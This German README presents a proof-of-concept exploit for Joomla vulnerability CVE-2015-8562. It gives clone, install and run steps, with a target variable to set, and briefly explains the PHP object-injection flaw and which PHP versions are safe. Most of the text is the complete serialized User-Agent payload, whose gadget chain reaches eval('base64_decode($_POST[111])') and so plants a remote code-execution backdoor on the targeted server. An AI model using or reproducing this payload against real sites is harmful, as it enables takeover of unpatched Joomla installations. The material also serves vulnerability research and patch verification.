
Ein Proof-of-Concept für die Joomla-Sicherheitslücke CVE-2015-8562
Ein Proof of Concept für die Schwachstelle CVE-2015-8562 in Joomla
Dieser PoC ist eine nahezu 1:1-Kopie von Garys Python-Implementierung, gehostet auf exploit-db.
Die Installation ist sehr einfach:
git clone https://github.com/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC.git
cd Joomla-CVE-2015-8562-PHP-POC
composer install
Sobald Composer alles installiert hat, müssen Sie $target in exploit.php ändern.
Danach sind Sie bereit:
php exploit.php
Im Dezember 2015 wurde eine Schwachstelle in Joomla gefunden. Sie ermöglicht es entfernten Angreifern, PHP-Objekt-Injection-Angriffe durchzuführen und beliebigen PHP-Code über den HTTP-User-Agent-Header auszuführen.
Diese Schwachstelle betrifft alle Versionen von Joomla. Ein Patch für v1.5.x, v2.5x und v3.x ist bereits veröffentlicht.
Wenn Sie PHP >= 5.4.45, >= 5.5.29 oder >= 5.6.13 ausführen, sind Sie sicher, da dieser Exploit auch CVE-2015-6835 verwendet.
Nikos Verschore von PatrolServer hat einen sehr detaillierten Blogbeitrag verfasst und war eine große Hilfe beim Verständnis dieser Schwachstelle. Sie können ihren Mini-Scanner kostenlos nutzen, um zu überprüfen, ob Ihre Website gefährdet ist.
So sieht der gesendete User-Agent-Header aus:
jklmj}__jklmjklmjk|O:21:"JDatabaseDriverMysqli":3:{
s:4:"\0\0\0a";
O:17:"JSimplepieFactory":0:{}
s:21:"\0\0\0disconnectHandlers";
a:1:{
i:0;
a:2:{
i:0;
O:9:"SimplePie":5:{
s:8:"sanitize";
O:20:"JDatabaseDriverMysql":0:{}
s:5:"cache";
b:1;
s:19:"cache_name_function";
s:6:"assert";
s:10:"javascript";
i:9999;
s:8:"feed_url";
s:62:"eval('base64_decode($_POST[111])');JFactory::getConfig();exit;";
}
i:1;
s:4:"init";
}
}
s:13:"\0\0\0connection";
i:1;
}